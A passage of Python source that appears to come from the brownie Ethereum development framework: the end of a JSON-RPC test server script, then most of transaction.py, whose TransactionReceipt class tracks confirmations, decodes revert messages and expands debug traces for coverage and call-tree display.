server = make_server()
def test_wrapper():
test_jsonrpc_server()
run = False
sys.exit()
thread = Thread(target=test_wrapper)
thread.start()
while run:
server.handle_request()
sys.exit()
except KeyboardInterrupt:
sys.exit()
|
transaction.py
|
#!/usr/bin/python3
import functools
import re
import sys
import threading
import time
from collections import deque
from enum import IntEnum
from hashlib import sha1
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Union
import black
import requests
from eth_abi import decode_abi
from hexbytes import HexBytes
from web3.exceptions import TransactionNotFound
from brownie._config import CONFIG
from brownie.convert import EthAddress, Wei
from brownie.exceptions import ContractNotFound, RPCRequestError
from brownie.project import build
from brownie.project import main as project_main
from brownie.project.compiler.solidity import SOLIDITY_ERROR_CODES
from brownie.project.sources import highlight_source
from brownie.test import coverage
from brownie.utils import color
from brownie.utils.output import build_tree
from . import state
from .event import EventDict, _decode_logs, _decode_trace
from .web3 import web3
_marker = deque("-/|\\-/|\\")
def trace_property(fn: Callable) -> Any:
# attributes that are only available after querying the tranasaction trace
@property # type: ignore
def wrapper(self: "TransactionReceipt") -> Any:
if self.status < 0:
return None
if self._trace_exc is not None:
raise self._trace_exc
try:
return fn(self)
except RPCRequestError as exc:
if web3.supports_traces:
# if the node client supports traces, raise the actual error
raise exc
raise RPCRequestError(
f"Accessing `TransactionReceipt.{fn.__name__}` on a {self.status.name.lower()} "
"transaction requires the `debug_traceTransaction` RPC endpoint, but the node "
"client does not support it or has not made it available."
) from None
return wrapper
def trace_inspection(fn: Callable) -> Any:
def wrapper(self: "TransactionReceipt", *args: Any, **kwargs: Any) -> Any:
if self.contract_address:
raise NotImplementedError(
"Trace inspection methods are not available for deployment transactions."
)
if self.input == "0x" and self.gas_used == 21000:
return None
return fn(self, *args, **kwargs)
functools.update_wrapper(wrapper, fn)
return wrapper
class Status(IntEnum):
Dropped = -2
Pending = -1
Reverted = 0
Confirmed = 1
class TransactionReceipt:
"""Attributes and methods relating to a broadcasted transaction.
* All ether values are given as integers denominated in wei.
* Before the tx has confirmed, most attributes are set to None
* Accessing methods / attributes that query debug_traceTransaction
may be very slow if the transaction involved many steps
Attributes:
contract_name: Name of the contract called in the transaction
fn_name: Name of the method called in the transaction
txid: Transaction ID
sender: Address of the sender
receiver: Address of the receiver
value: Amount transferred
gas_price: Gas price
gas_limit: Gas limit
gas_used: Gas used
input: Hexstring input data
confirmations: The number of blocks since the transaction was confirmed
nonce: Transaction nonce
block_number: Block number this transaction was included in
timestamp: Timestamp of the block this transaction was included in
txindex: Index of the transaction within the mined block
contract_address: Address of contract deployed by the transaction
logs: Raw transaction logs
status: Transaction status: -1 pending, 0 reverted, 1 successful
Additional attributes:
(only available if debug_traceTransaction is enabled in the RPC)
events: Decoded transaction log events
trace: Expanded stack trace from debug_traceTransaction
return_value: Return value(s) from contract call
revert_msg: Error string from reverted contract all
modified_state: Boolean, did this contract write to storage?"""
# these are defined as class attributes to expose them in console completion hints
block_number = None
contract_address: Optional[str] = None
contract_name = None
fn_name = None
gas_used = None
logs: Optional[List] = None
nonce = None
sender = None
txid: str
txindex = None
type: int
def __init__(
self,
txid: Union[str, bytes],
sender: Any = None,
silent: bool = True,
required_confs: int = 1,
is_blocking: bool = True,
name: str = "",
revert_data: Optional[Tuple] = None,
) -> None:
"""Instantiates a new TransactionReceipt object.
Args:
txid: hexstring transaction ID
sender: sender as a hex string or Account object
required_confs: the number of required confirmations before processing the receipt
is_blocking: if True, creating the object is a blocking action until the required
confirmations are received
silent: toggles console verbosity (default True)
name: contract function being called
revert_data: (revert string, program counter, revert type)
"""
self._silent = silent
if isinstance(txid, bytes):
txid = HexBytes(txid).hex()
if not self._silent:
print(f"\rTransaction sent: {color('bright blue')}{txid}{color}")
# this event is set once the transaction is confirmed or dropped
# it is used to waiting during blocking transaction actions
self._confirmed = threading.Event()
# internal attributes
self._call_cost = 0
self._trace_exc: Optional[Exception] = None
self._trace_origin: Optional[str] = None
self._raw_trace: Optional[List] = None
self._trace: Optional[List] = None
self._events: Optional[EventDict] = None
self._return_value: Any = None
self._revert_msg: Optional[str] = None
self._dev_revert_msg: Optional[str] = None
self._modified_state: Optional[bool] = None
self._new_contracts: Optional[List] = None
self._internal_transfers: Optional[List[Dict]] = None
self._subcalls: Optional[List[Dict]] = None
# attributes that can be set immediately
self.sender = sender
self.status = Status(-1)
self.txid = str(txid)
self.contract_name = None
self.fn_name = name
if name and "." in name:
self.contract_name, self.fn_name = name.split(".", maxsplit=1)
# avoid querying the trace to get the revert string if possible
self._revert_msg, self._revert_pc, revert_type = revert_data or (None, None, None)
if self._revert_msg is None and revert_type not in ("revert", "invalid_opcode"):
self._revert_msg = revert_type
if self._revert_pc is not None:
self._dev_revert_msg = build._get_dev_revert(self._revert_pc) or None
self._await_transaction(required_confs, is_blocking)
def __repr__(self) -> str:
color_str = {-2: "dark white", -1: "bright yellow", 0: "bright red", 1: ""}[self.status]
return f"<Transaction '{color(color_str)}{self.txid}{color}'>"
def __hash__(self) -> int:
return hash(self.txid)
@trace_property
def events(self) -> Optional[EventDict]:
if self._events is None:
if self.status:
# relay contract map so we can decode ds-note logs
addrs = {log.address for log in self.logs} if self.logs else set()
contracts = {addr: state._find_contract(addr) for addr in addrs}
self._events = _decode_logs(self.logs, contracts=contracts) # type: ignore
else:
self._get_trace()
# get events from the trace - handled lazily so that other
# trace operations are not blocked in case of a decoding error
initial_address = str(self.receiver or self.contract_address)
self._events = _decode_trace(self._raw_trace, initial_address) # type: ignore
return self._events
@trace_property
def internal_transfers(self) -> Optional[List]:
if not self.status:
return []
if self._internal_transfers is None:
self._expand_trace()
return self._internal_transfers
@trace_property
def modified_state(self) -> Optional[bool]:
if not self.status:
self._modified_state = False
elif self._modified_state is None:
self._get_trace()
return self._modified_state
@trace_property
def new_contracts(self) -> Optional[List]:
if not self.status:
return []
if self._new_contracts is None:
self._expand_trace()
return self._new_contracts
@trace_property
def return_value(self) -> Optional[str]:
if not self.status:
return None
if self._return_value is None:
self._get_trace()
return self._return_value
@trace_property
def revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._revert_msg is None:
self._get_trace()
elif self.contract_address and self._revert_msg == "out of gas":
self._get_trace()
return self._revert_msg
@trace_property
def dev_revert_msg(self) -> Optional[str]:
if self.status:
return None
if self._dev_revert_msg is None:
self._get_trace()
return self._dev_revert_msg or None
@trace_property
def subcalls(self) -> Optional[List]:
if self._subcalls is None:
self._expand_trace()
subcalls = filter(lambda s: not _is_call_to_precompile(s), self._subcalls) # type: ignore
return list(subcalls)
@trace_property
def trace(self) -> Optional[List]:
if self._trace is None:
self._expand_trace()
return self._trace
@property
def timestamp(self) -> Optional[int]:
if self.status < 0:
return None
return web3.eth.get_block(self.block_number)["timestamp"]
@property
def confirmations(self) -> int:
if not self.block_number:
return 0
return web3.eth.block_number - self.block_number + 1
def replace(
self,
increment: Optional[float] = None,
gas_price: Optional[Wei] = None,
silent: Optional[bool] = None,
) -> "TransactionReceipt":
"""
Rebroadcast this transaction with a higher gas price.
Exactly one of `increment` and `gas_price` must be given.
Arguments
---------
increment : float, optional
Multiplier applied to the gas price of this transaction in order
to determine the new gas price
gas_price : Wei, optional
Absolute gas price to use in the replacement transaction
silent : bool, optional
Toggle console verbosity (default is same setting as this transaction)
Returns
-------
TransactionReceipt
New transaction object
"""
if increment is None and gas_price is None:
raise ValueError("Must give one of `increment` or `gas_price`")
if gas_price is not None and increment is not None:
raise ValueError("Cannot set `increment` and `gas_price` together")
if self.status > -1:
raise ValueError("Transaction has already confirmed")
if increment is not None:
gas_price = Wei(self.gas_price * increment)
if silent is None:
silent = self._silent
sender = self.sender
if isinstance(sender, EthAddress):
# if the transaction wasn't broadcast during this brownie session,
# check if the sender is unlocked - we might be able to replace anyway
from brownie import accounts
if sender in accounts:
sender = accounts.at(sender)
else:
raise ValueError("Sender address not in `accounts`")
return sender.transfer( # type: ignore
self.receiver,
self.value,
gas_limit=self.gas_limit,
gas_price=Wei(gas_price),
data=self.input,
nonce=self.nonce,
required_confs=0,
silent=silent,
)
def wait(self, required_confs: int) -> None:
if required_confs < 1:
return
if self.confirmations > required_confs:
print(f"This transaction already has {self.confirmations} confirmations.")
return
while True:
try:
tx: Dict = web3.eth.get_transaction(self.txid)
break
except TransactionNotFound:
if self.nonce is not None:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
if sender_nonce > self.nonce:
self.status = Status(-2)
self._confirmed.set()
return
time.sleep(1)
self._await_confirmation(tx["blockNumber"], required_confs)
def _raise_if_reverted(self, exc: Any) -> None:
if self.status or CONFIG.mode == "console":
return
if not web3.supports_traces:
# if traces are not available, do not attempt to determine the revert reason
raise exc or ValueError("Execution reverted")
if self._dev_revert_msg is None:
# no revert message and unable to check dev string - have to get trace
self._expand_trace()
if self.contract_address:
source = ""
elif CONFIG.argv["revert"]:
source = self._traceback_string()
else:
source = self._error_string(1)
contract = state._find_contract(self.receiver)
if contract:
marker = "//" if contract._build["language"] == "Solidity" else "#"
line = self._traceback_string().split("\n")[-1]
if marker + " dev: " in line:
self._dev_revert_msg = line[line.index(marker) + len(marker) : -5].strip()
raise exc._with_attr(
source=source, revert_msg=self._revert_msg, dev_revert_msg=self._dev_revert_msg
)
def _await_transaction(self, required_confs: int, is_blocking: bool) -> None:
# await tx showing in mempool
while True:
try:
tx: Dict = web3.eth.get_transaction(HexBytes(self.txid))
break
except (TransactionNotFound, ValueError):
if self.sender is None:
# if sender was not explicitly set, this transaction was
# not broadcasted locally and so likely doesn't exist
raise
if self.nonce is not None:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
if sender_nonce > self.nonce:
self.status = Status(-2)
return
if not self._silent:
sys.stdout.write(f" Awaiting transaction in the mempool... {_marker[0]}\r")
sys.stdout.flush()
_marker.rotate(1)
time.sleep(1)
self._set_from_tx(tx)
if not self._silent:
if self.type == 2:
max_gas = tx["maxFeePerGas"] / 10 ** 9
priority_gas = tx["maxPriorityFeePerGas"] / 10 ** 9
output_str = (
f" Max fee: {color('bright blue')}{max_gas}{color} gwei"
f" Priority fee: {color('bright blue')}{priority_gas}{color} gwei"
)
else:
gas_price = self.gas_price / 10 ** 9
output_str = f" Gas price: {color('bright blue')}{gas_price}{color} gwei"
print(
f"{output_str} Gas limit: {color('bright blue')}{self.gas_limit}{color}"
f" Nonce: {color('bright blue')}{self.nonce}{color}"
)
# await confirmation of tx in a separate thread which is blocking if
# required_confs > 0 or tx has already confirmed (`blockNumber` != None)
confirm_thread = threading.Thread(
target=self._await_confirmation, args=(tx["blockNumber"], required_confs), daemon=True
)
confirm_thread.start()
if is_blocking and (required_confs > 0 or tx["blockNumber"]):
confirm_thread.join()
def _await_confirmation(self, block_number: int = None, required_confs: int = 1) -> None:
# await first confirmation
block_number = block_number or self.block_number
nonce_time = 0.0
sender_nonce = 0
while True:
# every 15 seconds, check if the nonce increased without a confirmation of
# this specific transaction. if this happens, the tx has likely dropped
# and we should stop waiting.
if time.time() - nonce_time > 15:
sender_nonce = web3.eth.get_transaction_count(str(self.sender))
nonce_time = time.time()
try:
receipt = web3.eth.get_transaction_receipt(HexBytes(self.txid))
except TransactionNotFound:
receipt = None
# the null blockHash check is required for older versions of Parity
# taken from `web3._utils.transactions.wait_for_transaction_receipt`
if receipt is not None and receipt["blockHash"] is not None:
break
# continuation of the nonce logic 2 sections prior. we must check the receipt
# after querying the nonce, because in the other order there is a chance that
# the tx would confirm after checking the receipt but before checking the nonce
if sender_nonce > self.nonce: # type: ignore
self.status = Status(-2)
self._confirmed.set()
return
if not block_number and not self._silent and required_confs > 0:
if required_confs == 1:
sys.stdout.write(f" Waiting for confirmation... {_marker[0]}\r")
else:
sys.stdout.write(
f" Required confirmations: {color('bright yellow')}0/"
f"{required_confs}{color} {_marker[0]}\r"
)
_marker.rotate(1)
sys.stdout.flush()
time.sleep(1)
# silence other dropped tx's immediately after confirmation to avoid output weirdness
for dropped_tx in state.TxHistory().filter(
sender=self.sender, nonce=self.nonce, key=lambda k: k != self
):
dropped_tx._silent = True
self.block_number = receipt["blockNumber"]
# wait for more confirmations if required and handle uncle blocks
remaining_confs = required_confs
while remaining_confs > 0 and required_confs > 1:
try:
receipt = web3.eth.get_transaction_receipt(self.txid)
self.block_number = receipt["blockNumber"]
except TransactionNotFound:
if not self._silent:
sys.stdout.write(f"\r{color('red')}Transaction was lost...{color}{' ' * 8}")
sys.stdout.flush()
# check if tx is still in mempool, this will raise otherwise
tx = web3.eth.get_transaction(self.txid)
self.block_number = None
return self._await_confirmation(tx["blockNumber"], required_confs)
if required_confs - self.confirmations != remaining_confs:
remaining_confs = required_confs - self.confirmations
if not self._silent:
sys.stdout.write(
f"\rRequired confirmations: {color('bright yellow')}{self.confirmations}/"
f"{required_confs}{color} "
)
if remaining_confs == 0:
sys.stdout.write("\n")
sys.stdout.flush()
if remaining_confs > 0:
time.sleep(1)
self._set_from_receipt(receipt)
# if coverage evaluation is active, evaluate the trace
if (
CONFIG.argv["coverage"]
and not coverage._check_cached(self.coverage_hash)
and self.trace
):
self._expand_trace()
if not self._silent and required_confs > 0:
print(self._confirm_output())
# set the confirmation event and mark other tx's with the same nonce as dropped
self._confirmed.set()
for dropped_tx in state.TxHistory().filter(
sender=self.sender, nonce=self.nonce, key=lambda k: k != self
):
dropped_tx.status = Status(-2)
dropped_tx._confirmed.set()
def _set_from_tx(self, tx: Dict) -> None:
if not self.sender:
self.sender = EthAddress(tx["from"])
self.receiver = EthAddress(tx["to"]) if tx["to"] else None
self.value = Wei(tx["value"])
if "gasPrice" in tx:
self.gas_price = tx["gasPrice"]
self.gas_limit = tx["gas"]
self.input = tx["input"]
self.nonce = tx["nonce"]
self.type = int(HexBytes(tx.get("type", 0)).hex(), 16)
# if receiver is a known contract, set function name
if self.fn_name:
return
try:
contract = state._find_contract(tx["to"])
if contract is not None:
self.contract_name = contract._name
self.fn_name = contract.get_method(tx["input"])
except ContractNotFound:
# required in case the contract has self destructed
# other aspects of functionality will be broken, but this way we
# can at least return a receipt
pass
def _set_from_receipt(self, receipt: Dict) -> None:
"""Sets object attributes based on the transaction reciept."""
self.block_number = receipt["blockNumber"]
self.txindex = receipt["transactionIndex"]
self.gas_used = receipt["gasUsed"]
self.logs = receipt["logs"]
self.status = Status(receipt["status"])
if "effectiveGasPrice" in receipt:
self.gas_price = receipt["effectiveGasPrice"]
self.contract_address = receipt["contractAddress"]
if self.contract_address and not self.contract_name:
self.contract_name = "UnknownContract"
base = (
f"{self.nonce}{self.block_number}{self.sender}{self.receiver}"
f"{self.value}{self.input}{int(self.status)}{self.gas_used}{self.txindex}"
)
self.coverage_hash = sha1(base.encode()).hexdigest()
if self.fn_name:
state.TxHistory()._gas(self._full_name(), receipt["gasUsed"], self.status == Status(1))
def _confirm_output(self) -> str:
status = ""
if not self.status:
revert_msg = self.revert_msg if web3.supports_traces else None
status = f"({color('bright red')}{revert_msg or 'reverted'}{color}) "
result = (
f"\r {self._full_name()} confirmed {status} "
f"Block: {color('bright blue')}{self.block_number}{color} "
f"Gas used: {color('bright blue')}{self.gas_used}{color} "
f"({color('bright blue')}{self.gas_used / self.gas_limit:.2%}{color})"
)
if self.type == 2:
result += f" Gas price: {color('bright blue')}{self.gas_price / 10 ** 9}{color} gwei"
if self.status and self.contract_address:
result += (
f"\n {self.contract_name} deployed at: "
f"{color('bright blue')}{self.contract_address}{color}"
)
return result + "\n"
def _get_trace(self) -> None:
"""Retrieves the stack trace via debug_traceTransaction and finds the
return value, revert message and event logs in the trace.
"""
# check if trace has already been retrieved, or the tx warrants it
if self._raw_trace is not None:
return
self._raw_trace = []
if self.input == "0x" and self.gas_used == 21000:
self._modified_state = False
self._trace = []
return
if not web3.supports_traces:
raise RPCRequestError("Node client does not support `debug_traceTransaction`")
try:
trace = web3.provider.make_request( # type: ignore
"debug_traceTransaction", (self.txid, {"disableStorage": CONFIG.mode != "console"})
)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
msg = f"Encountered a {type(e).__name__} while requesting "
msg += "`debug_traceTransaction`. The local RPC client has likely crashed."
if CONFIG.argv["coverage"]:
msg += " If the error persists, add the `skip_coverage` marker to this test."
raise RPCRequestError(msg) from None
if "error" in trace:
self._modified_state = None
self._trace_exc = RPCRequestError(trace["error"]["message"])
raise self._trace_exc
self._raw_trace = trace = trace["result"]["structLogs"]
if not trace:
self._modified_state = False
return
if isinstance(trace[0]["gas"], str):
# handle traces where numeric values are returned as hex (Nethermind)
for step in trace:
step["gas"] = int(step["gas"], 16)
step["gasCost"] = int.from_bytes(HexBytes(step["gasCost"]), "big", signed=True)
step["pc"] = int(step["pc"], 16)
if self.status:
self._confirmed_trace(trace)
else:
self._reverted_trace(trace)
def _confirmed_trace(self, trace: Sequence) -> None:
self._modified_state = next((True for i in trace if i["op"] == "SSTORE"), False)
if trace[-1]["op"] != "RETURN" or self.contract_address:
return
contract = state._find_contract(self.receiver)
if contract:
data = _get_memory(trace[-1], -1)
fn = contract.get_method_object(self.input)
self._return_value = fn.decode_output(data)
def _reverted_trace(self, trace: Sequence) -> None:
self._modified_state = False
if self.contract_address:
step = next((i for i in trace if i["op"] == "CODECOPY"), None)
if step is not None and int(step["stack"][-3], 16) > 24577:
self._revert_msg = "exceeds EIP-170 size limit"
self._dev_revert_msg = ""
if self._dev_revert_msg is not None:
return
# iterate over revert instructions in reverse to find revert message
for step in (i for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")):
if step["op"] == "REVERT" and int(step["stack"][-2], 16):
# get returned error string from stack
data = _get_memory(step, -1)
selector = data[:4].hex()
if selector == "0x4e487b71": # keccak of Panic(uint256)
error_code = int(data[4:].hex(), 16)
if error_code in SOLIDITY_ERROR_CODES:
self._revert_msg = SOLIDITY_ERROR_CODES[error_code]
else:
self._revert_msg = f"Panic (error code: {error_code})"
elif selector == "0x08c379a0": # keccak of Error(string)
self._revert_msg = decode_abi(["string"], data[4:])[0]
else:
# TODO: actually parse the data
self._revert_msg = f"typed error: {data.hex()}"
elif self.contract_address:
self._revert_msg = "invalid opcode" if step["op"] == "INVALID" else ""
self._dev_revert_msg = ""
return
# check for dev revert string using program counter
dev_revert = build._get_dev_revert(step["pc"]) or None
if dev_revert is not None:
self._dev_revert_msg = dev_revert
if self._revert_msg is None:
self._revert_msg = dev_revert
else:
# if none is found, expand the trace and get it from the pcMap
self._expand_trace()
try:
contract = state._find_contract(step["address"])
pc_map = contract._build["pcMap"]
# if this is the function selector revert, check for a jump
if "first_revert" in pc_map[step["pc"]]:
idx = trace.index(step) - 4
if trace[idx]["pc"] != step["pc"] - 4:
step = trace[idx]
# if this is the optimizer revert, find the actual source
if "optimizer_revert" in pc_map[step["pc"]]:
idx = trace.index(step) - 1
# look for the most recent jump
while trace[idx + 1]["op"] != "JUMPDEST":
if trace[idx]["source"] != step["source"]:
# if we find another line with a differing source offset prior
# to a JUMPDEST, the optimizer revert is also the actual revert
idx = trace.index(step)
break
idx -= 1
while not trace[idx]["source"]:
# now we're in a yul optimization, keep stepping back
# until we find a source offset
idx -= 1
# at last we have the real location of the revert
step["source"] = trace[idx]["source"]
step = trace[idx]
if "dev" in pc_map[step["pc"]]:
self._dev_revert_msg = pc_map[step["pc"]]["dev"]
else:
# extract the dev revert string from the source code
# TODO this technique appears superior to `_get_dev_revert`, and
# changes in solc 0.8.0 have necessitated it. the old approach
# of building a dev revert map should be refactored out in favor
# of this one.
source = contract._sources.get(step["source"]["filename"])
offset = step["source"]["offset"][1]
line = source[offset:].split("\n")[0]
marker = "//" if contract._build["language"] == "Solidity" else "#"
revert_str = line[line.index(marker) + len(marker) :].strip()
if revert_str.startswith("dev:"):
self._dev_revert_msg = revert_str
if self._revert_msg is None:
self._revert_msg = self._dev_revert_msg or ""
return
except (KeyError, AttributeError, TypeError, ValueError):
pass
if self._revert_msg is not None:
if self._dev_revert_msg is None:
self._dev_revert_msg = ""
return
op = next((i["op"] for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")), None)
self._revert_msg = "invalid opcode" if op == "INVALID" else ""
def _expand_trace(self) -> None:
"""Adds the following attributes to each step of the stack trace:
address: The address executing this contract.
contractName: The name of the contract.
fn: The name of the function.
jumpDepth: Number of jumps made since entering this contract. The
initial value is 0.
source: {
filename: path to the source file for this step
offset: Start and end offset associated source code
}
"""
if self._raw_trace is None:
self._get_trace()
if self._trace is not None:
# in case `_get_trace` also expanded the trace, do not repeat
return
self._trace = trace = self._raw_trace
self._new_contracts = []
self._internal_transfers = []
self._subcalls = []
if self.contract_address or not trace:
coverage._add_transaction(self.coverage_hash, {})
return
if trace[0]["depth"] == 1:
self._trace_origin = "geth"
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
for t in trace:
t["depth"] = t["depth"] - 1
else:
self._trace_origin = "ganache"
if trace[0]["gasCost"] >= 21000:
# in ganache <6.10.0, gas costs are shifted by one step - we can
# identify this when the first step has a gas cost >= 21000
self._call_cost = trace[0]["gasCost"]
for i in range(len(trace) - 1):
trace[i]["gasCost"] = trace[i + 1]["gasCost"]
trace[-1]["gasCost"] = 0
else:
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
# last_map gives a quick reference of previous values at each depth
last_map = {0: _get_last_map(self.receiver, self.input[:10])} # type: ignore
coverage_eval: Dict = {last_map[0]["name"]: {}}
precompile_contract = re.compile(r"0x0{38}(?:0[1-9]|1[0-8])")
call_opcodes = ("CALL", "STATICCALL", "DELEGATECALL")
for i in range(len(trace)):
# if depth has increased, tx has called into a different contract
is_depth_increase = trace[i]["depth"] > trace[i - 1]["depth"]
is_subcall = trace[i - 1]["op"] in call_opcodes
if is_depth_increase or is_subcall:
step = trace[i - 1]
if step["op"] in ("CREATE", "CREATE2"):
# creating a new contract
out = next(x for x in trace[i:] if x["depth"] == step["depth"])
address = out["stack"][-1][-40:]
sig = f"<{step['op']}>"
calldata = None
self._new_contracts.append(EthAddress(address))
if int(step["stack"][-1], 16):
self._add_internal_xfer(step["address"], address, step["stack"][-1])
else:
# calling an existing contract
stack_idx = -4 if step["op"] in ("CALL", "CALLCODE") else -3
offset = int(step["stack"][stack_idx], 16)
length = int(step["stack"][stack_idx - 1], 16)
calldata = HexBytes("".join(step["memory"]))[offset : offset + length]
sig = calldata[:4].hex()
address = step["stack"][-2][-40:]
if is_depth_increase:
last_map[trace[i]["depth"]] = _get_last_map(address, sig)
coverage_eval.setdefault(last_map[trace[i]["depth"]]["name"], {})
self._subcalls.append(
{"from": step["address"], "to": EthAddress(address), "op": step["op"]}
)
if step["op"] in ("CALL", "CALLCODE"):
self._subcalls[-1]["value"] = int(step["stack"][-3], 16)
if is_depth_increase and calldata and last_map[trace[i]["depth"]].get("function"):
fn = last_map[trace[i]["depth"]]["function"]
self._subcalls[-1]["function"] = fn._input_sig
try:
zip_ = zip(fn.abi["inputs"], fn.decode_input(calldata))
inputs = {i[0]["name"]: i[1] for i in zip_} # type: ignore
self._subcalls[-1]["inputs"] = inputs
except Exception:
self._subcalls[-1]["calldata"] = calldata.hex()
elif calldata or is_subcall:
self._subcalls[-1]["calldata"] = calldata.hex() # type: ignore
if precompile_contract.search(str(self._subcalls[-1]["from"])) is not None:
caller = self._subcalls.pop(-2)["from"]
self._subcalls[-1]["from"] = caller
# update trace from last_map
last = last_map[trace[i]["depth"]]
trace[i].update(
address=last["address"],
contractName=last["name"],
fn=last["internal_calls"][-1],
jumpDepth=last["jumpDepth"],
source=False,
)
opcode = trace[i]["op"]
if opcode == "CALL" and int(trace[i]["stack"][-3], 16):
self._add_internal_xfer(
last["address"], trace[i]["stack"][-2][-40:], trace[i]["stack"][-3]
)
try:
pc = last["pc_map"][trace[i]["pc"]]
except (KeyError, TypeError):
# we don't have enough information about this contract
continue
if trace[i]["depth"] and opcode in ("RETURN", "REVERT", "INVALID", "SELFDESTRUCT"):
subcall: dict = next(
i for i in self._subcalls[::-1] if i["to"] == last["address"] # type: ignore
)
if opcode == "RETURN":
returndata = _get_memory(trace[i], -1)
if returndata:
fn = last["function"]
try:
return_values = fn.decode_output(returndata)
if len(fn.abi["outputs"]) == 1:
return_values = (return_values,)
subcall["return_value"] = return_values
except Exception:
subcall["returndata"] = returndata.hex()
else:
subcall["return_value"] = None
elif opcode == "SELFDESTRUCT":
subcall["selfdestruct"] = True
else:
if opcode == "REVERT":
data = _get_memory(trace[i], -1)
if len(data) > 4:
try:
subcall["revert_msg"] = decode_abi(["string"], data[4:])[0]
except Exception:
subcall["revert_msg"] = data.hex()
if "revert_msg" not in subcall and "dev" in pc:
subcall["revert_msg"] = pc["dev"]
if "path" not in pc:
continue
trace[i]["source"] = {"filename": last["path_map"][pc["path"]], "offset": pc["offset"]}
if "fn" not in pc:
continue
# calculate coverage
if last["coverage"]:
if pc["path"] not in coverage_eval[last["name"]]:
coverage_eval[last["name"]][pc["path"]] = [set(), set(), set()]
if "statement" in pc:
coverage_eval[last["name"]][pc["path"]][0].add(pc["statement"])
if "branch" in pc:
if pc["op"] != "JUMPI":
last["active_branches"].add(pc["branch"])
elif "active_branches" not in last or pc["branch"] in last["active_branches"]:
# false, true
key = 1 if trace[i + 1]["pc"] == trace[i]["pc"] + 1 else 2
coverage_eval[last["name"]][pc["path"]][key].add(pc["branch"])
if "active_branches" in last:
last["active_branches"].remove(pc["branch"])
# ignore jumps with no function - they are compiler optimizations
if "jump" in pc:
# jump 'i' is calling into an internal function
if pc["jump"] == "i":
try:
fn = last["pc_map"][trace[i + 1]["pc"]]["fn"]
except (KeyError, IndexError):
continue
if fn != last["internal_calls"][-1]:
last["internal_calls"].append(fn)
last["jumpDepth"] += 1
# jump 'o' is returning from an internal function
elif last["jumpDepth"] > 0:
del last["internal_calls"][-1]
last["jumpDepth"] -= 1
coverage._add_transaction(
self.coverage_hash, dict((k, v) for k, v in coverage_eval.items() if v)
)
def _add_internal_xfer(self, from_: str, to: str, value: str) -> None:
self._internal_transfers.append( # type: ignore
{"from": EthAddress(from_), "to": EthAddress(to), "value": Wei(f"0x{value}")}
)
def _full_name(self) -> str:
if self.contract_name and self.fn_name:
return f"{self.contract_name}.{self.fn_name}"
return self.fn_name or "Transaction"
def info(self) -> None:
"""Displays verbose information about the transaction, including decoded event logs."""
result = f"Tx Hash: {self.txid}\nFrom: {self.sender}\n"
if self.contract_address and self.status:
result += f"New {self.contract_name} address: {self.contract_address}\n"
else:
result += f"To: {self.receiver}\n" f"Value: {self.value}\n"
if self.input != "0x" and int(self.input, 16):
result += f"Function: {self._full_name()}\n"
result += (
f"Block: {self.block_number}\nGas Used: "
f"{self.gas_used} / {self.gas_limit} "
f"({self.gas_used / self.gas_limit:.1%})\n"
)
if self.events:
events = list(self.events)
call_tree: List = ["--------------------------"]
while events:
idx = next(
(events.index(i) for i in events if i.address != events[0].address), len(events)
)
contract = state._find_contract(events[0].address)
if contract:
try:
name = contract.name()
except Exception:
name = contract._name
sub_tree: List = [f"{name} ({events[0].address})"]
else:
sub_tree = [f"{events[0].address}"]
for event in events[:idx]:
sub_tree.append([event.name, *(f"{k}: {v}" for k, v in event.items())])
call_tree.append(sub_tree)
events = events[idx:]
event_tree = build_tree([call_tree], multiline_pad=0, pad_depth=[0, 1])
result = f"{result}\nEvents In This Transaction\n{event_tree}"
result = color.highlight(result)
status = ""
if not self.status:
status = f"({color('bright red')}{self.revert_msg or 'reverted'}{color})"
print(f"Transaction was Mined {status}\n---------------------\n{result}")
def _get_trace_gas(self, start: int, stop: int) -> Tuple[int, int]:
total_gas = 0
internal_gas = 0
is_internal = True
trace = self.trace
for i in range(start, stop):
# Check if we are in a subfunction or not
if is_internal and not _step_compare(trace[i], trace[start]):
is_internal = False
# For the internal gas tracking we ignore the gas passed to an external call
if trace[i]["depth"] > trace[start]["depth"]:
internal_gas -= trace[i - 1]["gasCost"]
elif not is_internal and _step_compare(trace[i], trace[start]):
is_internal = True
total_gas += trace[i]["gasCost"]
if is_internal:
internal_gas += trace[i]["gasCost"]
# manually add gas refunds where they occur
if trace[i]["op"] == "SSTORE" and int(trace[i]["stack"][-2], 16) == 0:
# 15000 gas is refunded if a word is set to 0x0
# Note: There is currently no way to check if the value was 0x0 before.
# This will give an incorrect refund if 0x0 is assigned to 0x0.
total_gas -= 15000
if is_internal:
internal_gas -= 15000
if trace[i]["op"] == "SELFDESTRUCT":
# 24000 gas is refunded on selfdestruct
total_gas -= 24000
if is_internal:
internal_gas -= 24000
# For external calls, add the remaining gas returned back
if start > 0 and trace[start]["depth"] > trace[start - 1]["depth"]:
total_gas += trace[start - 1]["gasCost"]
internal_gas += trace[start - 1]["gasCost"]
return internal_gas, total_gas
@trace_inspection
def call_trace(self, expand: bool = False) -> None:
"""
Display the complete sequence of contracts and methods called during
the transaction. The format:
Contract.functionName [instruction] start:stop [gas used]
* start:stop are index values for the `trace` member of this object,
showing the points where the call begins and ends
* for calls that include subcalls, gas use is displayed as
[gas used in this frame / gas used in this frame + subcalls]
* Calls displayed in red ended with a `REVERT` or `INVALID` instruction.
Arguments
---------
expand : bool
If `True`, show an expanded call trace including inputs and return values
"""
trace = self.trace
key = _step_internal(
trace[0], trace[-1], 0, len(trace), self._get_trace_gas(0, len(self.trace))
)
call_tree: List = [[key]]
active_tree: List = [call_tree[0]]
# (index, depth, jumpDepth) for relevent steps in the trace
trace_index = [(0, 0, 0)] + [
(i, trace[i]["depth"], trace[i]["jumpDepth"])
for i in range(1, len(trace))
if not _step_compare(trace[i], trace[i - 1])
]
subcalls = self.subcalls[::-1]
for i, (idx, depth, jump_depth) in enumerate(trace_index[1:], start=1):
last = trace_index[i - 1]
if depth == last[1] and jump_depth < last[2]:
# returning from an internal function, reduce tree by one
active_tree.pop()
continue
elif depth < last[1]:
